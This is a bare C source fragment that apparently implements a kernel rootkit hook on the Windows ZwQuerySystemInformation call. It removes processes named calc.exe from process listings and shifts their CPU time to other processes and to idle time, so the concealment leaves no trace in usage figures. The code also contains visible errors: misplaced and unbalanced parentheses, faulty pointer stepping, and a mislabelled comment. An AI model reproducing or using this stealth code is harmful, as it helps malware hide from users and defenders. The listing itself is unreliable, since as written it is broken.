1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126
|
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters; //windows 2000 only
struct _SYSTEM_THREADS Threads[1];
};
struct _SYSTEM_PROCESSOR_TIMES
{
LARGE_INTEGER IdleTime;
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER DpcTime;
LARGE_INTEGER InterruptTime;
ULONG InterruptCount;
};
extern "C" NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
typedef NTSTATUS (*ZwQuerySystemInformationPtr)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
ZwQuerySystemInformationPtr ZwQuerySystemInformationOld;
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;
NTSTATUS NewZwQuerySystemInformation(IN ULONG SystemInformationClass,IN PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
ntStatus = ((ZwQuerySystemInformationPtr)(ZwQuerySystemInformationOld))(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
if(NT_SUCCESS(ntStatus))
{
//File and Directory Listing
if(SystemInformationClass==5)
{
struct _SYSTEM_PROCESSES *cPRS = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *pPRS = NULL;
while (cPRS)
{
if(cPRS->ProcessName.Buffer != NULL)
{
if(memcmp(cPRS->ProcessName.Buffer,L"calc.exe",12 == 0))
{
m_UserTime.QuadPart += cPRS->UserTime.QuadPart;
m_KernelTime.QuadPart += cPRS->KernelTime.QuadPart;
if(pPRS)
{
if(cPRS->NextEntryDelta)
{
pPRS->NextEntryDelta += cPRS->NextEntryDelta;
}
else
{
pPRS->NextEntryDelta = 0;
}
}
else
{
if(cPRS->NextEntryDelta)
{
SystemInformation = (char *)SystemInformation + cPRS->NextEntryDelta);
}
else
SystemInformation = NULL;
}
}
}
else
{
cPRS->UserTime.QuadPart += m_UserTime.QuadPart;
cPRS->KernelTime.QuadPart += m_KernelTime.QuadPart;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
pPRS = cPRS;
if(cPRS->NextEntryDelta)(cPRS += cPRS->NextEntryDelta);
else cPRS = NULL;
}
}
else if(SystemInformationClass == 8)
{
struct _SYSTEM_PROCESSOR_TIMES *times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
}
}
return ntStatus;
}
|